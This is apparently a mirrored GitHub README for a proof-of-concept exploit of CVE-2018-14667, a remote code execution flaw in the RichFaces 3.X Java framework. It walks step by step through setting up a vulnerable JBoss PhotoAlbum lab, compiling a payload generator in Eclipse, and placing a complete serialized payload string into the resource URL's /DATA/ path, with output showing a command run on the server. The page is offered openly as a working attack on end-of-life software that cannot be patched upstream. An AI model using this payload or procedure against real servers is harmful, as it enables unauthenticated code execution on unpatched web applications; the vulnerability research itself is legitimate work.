CVE-2018-14667 PoC — RichFaces Framework 代码注入漏洞

Source

Associated Vulnerability

Description

All about CVE-2018-14667; From what it is to how to successfully exploit it.

Readme

# CVE-2018-14667

After spending many time to understand and correctly exploit this CVE, I decided to build a repo on the RichFaces 3.X RCE bug and share the HOWTOs step by step with the community.

**0x00 : Introduction on RichFaces 3.X bug**
<p align="left">
  <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/RichFaces.jpg" width="350" title="hover text">
</p>

On Monday, November 19, *Joao F M Figueiredo* published a well detailed article (https://seclists.org/fulldisclosure/2018/Nov/47) on a critical high-risk RichFaces vulnerability.  
**CVSS3 Base Score	9.8**

This vulnerability will allow any unauthenticated users to perform remote code execution on any web application using RichFaces 3.X (all version) which is pretty much the worst case scenario.

**0x01 : Am I affected?**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/screaming.jpg" width="20"/>

Well, if you are running RichFaces 3.X (any version of RichFaces 3) and you see the following code in your source, chances are that yes, you might be vulnerable to remote code execution on CVE-2018-14667:

* org.ajax4jsf.resource.InternetResource  
* org.ajax4jsf.resource.SerializableResource  
* javax.el.Expression  
* javax.faces.el.MethodBinding  
* javax.faces.component,StateHolderSaver  
* java.awt.Color  

**0x02 : Running a vulnerable environment to test the bug**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/bug.jpg" width="20"/>

I will basically re-explain what has been already covered in the article of seclists.org on how to deploy a vulnerable environment.  
1. Download JBoss 5.1.0GA and a demo application with RichFaces which contains the PhotoAlbum application.    
→ http://downloads.jboss.org/richfaces/releases/3.3.X/3.3.4.Final/richfaces-examples-3.3.4.Final.zip  
→ https://sourceforge.net/projects/jboss/files/JBoss/JBoss-5.1.0.GA/
2. Unzip the ZIP archive.  
3. Copy the application *richfaces-examples-3.3.4.Final/photoalbum/dist/photoalbum-ear-3.3.4.Final.ear* to the JBoss deploy directory *jboss-5.1.0.GA/server/default/deploy/*  
4. Start the JBoss application server using the following syntax (make sure before launching that your port 8080 is not already in use): cd bin ; ./run.sh -b 0.0.0.0  
5. You'll need to browse on the PhotoAlbum Index page in order to activate the web application.  

**0x03 : Generating a valid payload**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/smirk.jpg" width="20"/>

Now the fun part! This is where I've experienced difficulties so I will explain in details how to generate a valid payload and without repeating the same errors I did. I would suggest first to use Eclipse for compiling the payload.  
1. Download Eclipse on the following link:  
→ https://www.eclipse.org/downloads/  
2. Launch Eclipse and choose to create a new Web Project.  
3. Get the payload generator (credits goes to *orich1* from https://xz.aliyun.com/t/3264) available in this repo  
→ https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/Main.java  
4. Extract the WAR archive in this repo (richfaces-demo-3.3.0.GA-tomcat6.war), copy all .jar files from WEB-INF/lib/ folder to WebContent/WEB-INF/lib/ in your Java Web Project in Eclipse  
→ https://github.com/syriusbughunt/CVE-2018-14667/blob/master/richfaces-demo-3.3.0.GA-tomcat6.war  
5. Add the *Main.java* file in Eclipse; right-click on your Java Web Project name in Eclipse, New, File.  
6. Make the WebContent/WEB-INF/lib folder as the Build Path source in Eclipse; right-click on the lib folder, Build Path, Use as Source Folder.  
7. Let's see if you can get lucky; click on the green Play button to run the compiler. If you get 0 errors and a valid payload in your output, congratulations, you now have a valid payload for CVE-2018-14667. Now, if you are having all kind of errors, don't panic. You might want to comment the  following lines: 29,30,31,32,33,34,35 to look like this:  
```
        // Class clazz = Class.forName("javax.el.MethodExpression");
        // Field field = clazz.getField("serialVersionUID");
        // field.setAccessible(true);
        // Field modifiersField = Field.class.getDeclaredField("modifiers");
        // modifiersField.setAccessible(true);
        // modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
        // field.setLong(null, MethodExpressionSerialVersionUID);
```

Your output result in Eclipse should look like the following:
```
/DATA/eAHNVU1rE0EYnkarbf2qtqhVhLiKTUVmW6mHWgOFKiqkFpq2fvQgk82bZOJ-dWY2WSwVRUSwIkjxpiJ4bS!6B!ToJ9Jf4EEREUEE8SbOzKaJDeqhp-xpZvfZ533med59d-ErauYMHfRYHpMiCfuLPIcZcC9gFuAJDmysstk!wehxIghSV8eRLzG0NoU2WQyIgGHPFeAKgbaliqRETJu4eXM0UwRLDKbQegh9Kjmn0RXUlEItjpelOQrZyr65ROwA9Cb0pZYDiiLEOWIBx5bn-J4ruXFayEKnPDsLLE1KwM6!fJqcv!9mJIZiKdRq2YTzM8SBlRrSglE3LzW0cflOVnMItD1SST0zDYwSm14mGRsGQ1-V75YlMQ9cLcAGwTHYeJzkR0AUvOyJ0Jcn4dRztQ8INW1EKGSoKxItofW4J-bLuQ8!--!ENK6jiqsxPb5xK!39wtIxhVAKBlQYjFqFyIKAYuL7NrWIkGUjH-qLnGUSAgwn7l07ujD2UXvSmSEcohBqtQTapQ8fmmCbk8r42jNp0zqfMB3k7hqqvtZgqLJqkULjSmgx43HtUR3bace3BxZn287Ni-7Io53Vs9dBy21Xp94!-3VXGaC4W8uP0PV9MwymA-AC50EMq3gTPdVlyiOyD-QNWy6ih4Zix6rz8FjgCuqAofGR!IQhWWr3qVvyLkHCDWy7B0MIVsIQXmAV4qZwfJOoy-iZ!U-qvh9KA!auMKDeKOVA5tuOHxuebx1RDmjbyjcb42goYKhjSqccmVb5VBaXJj993jNzUjej7PGYQJ3aWerh0UD4gZBAII5A7TXDoy6TnpSX0Duz2rqmA1lKordMCIn0A7hZ9CGf1mscFoRjx4d6D!XGh!r6Dvf1J40VAyXZAE1ghHpwrdGj6R-zoa6f!xwNKvR2zbCl!ADNNcCB4hCNY7RZBxgIamM52EHF9xa9Xl18BTleL-YCN2lU2BsrOpVCVyWFh-h2I6Sw!Bf8Wwyv0IvVxVAMuEgay9SNkYFALao7xuUo!w0w9PXD.jsf
```

**0x04 : Sending your payload and get Remote Code Execution**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/bomb.jpg" width="20"/>

Navigate in your browser to your local JBoss server running PhotoAlbum Web Application http://192.168.100.2:8080/photoalbum and right-click to view page source. Hit Ctrl+F and search for '/DATA/'. You should find something similar to this:
```
src="/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/eAF1Uk1rFEEQrQwGEz9AXVFyCMQoCiI9JCZeYkBQ0cCsQccI6ql2pna2h57ptrtndzDozYuCF6!evOpFf4HXgJf8BkFEBBHEq929QUnAvlXx6r1Xr!rtd5g0Gs5LXTAssV0qTZ9pMrLRGbENQ!rOTnFmQ!NraBH86yx!i2BfAoczTWjpqqwt1dbCsaTEIcYC6yJe75WU2ZUE9lOruON8BE9hIoGpSua8zynfqSeHKBoKRaucl7OeomV9zMiwTFZK1o6bpdYJ3ZQiJ53ikPT9rQ-rr15!6kYQJTCdCTTmFla020NqNa8L5-GAcTN54LBwYuySyzglzVHwx9gTtNIqL3!OSTLT1MGAIGsYCXYXiy7Zgcyvt8ptYrisQw4AE4cAWg0zY9MOuhf3Pt568fn30sso4Dp!cf-Y3jx7nv58sH3ZI7yDU!4YZU-aIL2Xb61Sovfj5K-DH492vbYPbmo0CzOnN3mFBSUSXURMIa!tmm88AWg0dB6GpZk!jcsyxPJu-96Xr7ObN4Kw2yeycNz7Y1yy9caqxjogYWXhSGiH2fFZlWpHKdyOeZ2JJicTB-3YCO6KgRyxdmArMXfl4sKFhcVLc7u-yer8f63OuxuoP9Xj4!8_" style="opacity: 0.1" class="main-image"><span class="rich-tool-tip tooltip" 
```
You can clearly see the serialized object. This is where we will replace the serialized object by our payload to get remote code execution. In your browser, change the URL to http://192.168.100.2:8080/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/YOUR-PAYLOAD-GENERATED-IN-ECLIPSE. My payload was executing the following command 'touch /tmp/PoorRichFaces'. Let's see if I had success:
```
drwxrwxrwt 12 root   root    32768 Nov 30 01:45 .
drwxr-xr-x 25 root   root     4096 Nov 25 12:57 ..
-rw-rw-r--  1 syrius syrius      0 Nov 30 1:27 PoorRichFaces 
```
Feels good, isn't it? We just got RCE on a Java Web Application running RichFaces 3.X.  

**0x05 : How to patch ?**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/patch.jpg" width="20"/>
 
You might not like this fact so be ready and hang on to your keyboard; RichFaces has reached the end of life concerning the support of their product so users (you) should apply their own patch. Don't panic, if you can't find a way to patch, don't hesitate to contact me, we can make an arrangement so I could patch your Java Web Applications.  

E-mail: syriusbughunt@protonmail.com

File Snapshot

 [4.0K]  /data/pocs/c722c8ef0e71d4ccd5074894094eaf8d72622a98
├── [4.0K]  img
│   ├── [ 28K]  bomb.jpg
│   ├── [ 29K]  bug.jpg
│   ├── [ 16K]  patch.jpg
│   ├── [ 26K]  RichFaces.jpg
│   ├── [ 20K]  screaming.jpg
│   └── [ 22K]  smirk.jpg
├── [5.1K]  Main.java
├── [7.8K]  README.md
└── [ 15M]  richfaces-demo-3.3.0.GA-tomcat6.war

1 directory, 9 files

Remarks